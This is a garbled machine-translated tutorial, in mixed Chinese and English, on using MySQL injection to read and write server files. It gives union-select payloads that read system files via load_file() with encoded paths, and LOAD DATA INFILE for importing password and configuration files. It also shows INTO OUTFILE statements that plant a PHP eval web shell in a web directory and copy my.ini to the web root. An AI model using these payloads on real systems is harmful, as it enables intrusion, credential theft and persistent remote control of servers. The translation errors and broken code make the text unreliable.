Introduction to MySQL injected into the Heavenly book import and Export

Background-3 Import and export related operations explained

1. load_file () export File

   Load_file (file_name): reads the file and returns the contents of the file as a string.

   Conditions of Use:

   A. Must have permission to read and the file must be fully readable?

   ? ? ? ? ? and (select COUNT (*) from Mysql.user) >0/* If the result returns to normal, the description has read and write permissions.

   ? ? ? and (select COUNT (*) from Mysql.user) >0/* return an error, should be administrator to the database account down right

   B, to read the file must be on the server?

   C. Must specify the path of the file complete?

   D, to read the file must be less than max_allowed_packet?

   If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. More difficult to meet is the permissions, under Windows, if NTFS is set up properly, is unable to read the relevant files, when encountered only administrators to access files, users do not want to load_file out.

   In the actual injection, we have two difficult points to solve:?

   ? Absolute physical path?

   Construct an effective malformed statement? (absolute path of error)

   In many PHP programs, when a wrong query is submitted, if display_errors = ON, the program exposes the absolute path to the Web directory, and as long as the path is known, the security of the entire server is severely compromised for a PHP program that can be injected.

   Common paths:

   Http://www.cnblogs.com/lcamry/p/5729087.html

   ?

   示例：Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

   利用hex()将文件内容导出来，尤其是smb文件时可以使用。

   ?

   -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))?

   Explain："char(99,58,47,98,111,111,116,46,105,110,105)"就是"c:/boot.ini"的ASCII代码

   ?

   -1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)?

   Explain："c:/boot.ini"的16进制是"0x633a2f626f6f742e696e69"

   ?

   -1 union select 1,1,1,load_file(c:\\boot.ini)?

   Explain:路径里的/用 \\代替

   ?

2. 文件导入到数据库

   The LOAD DATA infile statement is used to read rows from a text file at high speed and load a table. The file name must be a literal string.

   In the injection process, we often need some special files, such as configuration files, password files and so on. When you have permissions to the database, you can import the system files into the database using the load data infile.

   Function specific Description: For the parameter introduction here is not too much to repeat, you can refer to the MySQL documentation. (Reminder: Reference document is the best learning material)

   Example: Load data infile '/tmp/t0.txt ' ignore into table t0 character set GBK fields terminated by ' \ t ' lines terminated by ' \ n ‘

   Import/tmp/t0.txt into the T0 table, character set GBK is the character set to Gbk,fields terminated by is the delimiter between each item of data, and lines terminated by is the end character of the line.

   When the error code is 2, the file does not exist, the error code is 13 when there is no permission, you can consider the/tmp folder.

   TIPS: We see from the mysql5.7 document that the load XML function has been added, and whether it can still be used for injection also requires validation.

3. Import to File

   SELECT ..... Into OUTFILE ' file_name '

   The selected line can be written to a file. The file is created on the server host, so you must have file permissions to use this syntax. file_name cannot be a file that already exists.

   We generally have two forms of utilization:

   The first is to import the select content directly into a file:

   Select version () into outfile "c:\\phpnow\\htdocs\\test.php"

   Replace version () here with a sentence, <?php @eval ($_post["Mima")?>

   Select <?php @eval ($_post["Mima")?>? into OutFile "c:\\phpnow\\htdocs\\test.php"

   Directly connect a word on it, in fact, in the select content can not only upload a word, you can also upload a lot of content.

   ??

   End of the second modification file:

   Select version () into outfile "c:\\phpnow\\htdocs\\test.php"? LINES TERMINATED by 0x16 binary file

   解释：通常是用‘\r\n‘结尾，此处我们修改为自己想要的任何文件。同时可以用FIELDS TERMINATED BY 

   16 binary can be a sentence or any other code, can be constructed on its own. In Sqlmap Os-shell take is this way, concrete can refer to Os-shell analysis article: http://www.cnblogs.com/lcamry/p/5505110.html?

   ?

   ?

   TIPS:

   (1) may be in the file path to pay attention to escape, this depends on the specific environment

   ?? (2) we mentioned Load_file (), but we can use the following statement when the current station is unable to export data:

   Select Load_file (' C:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini ') into outfile ' c:\\wamp\\www\\test.php '

   You can use this statement to import the contents of the server into a directory under the Web server so that you can get the data. There are password items in the above My.ini (although the default is commented), there will certainly be a lot of content can be exported, this should be accumulated at ordinary times.

Introduction to MySQL injected into the Heavenly book import and Export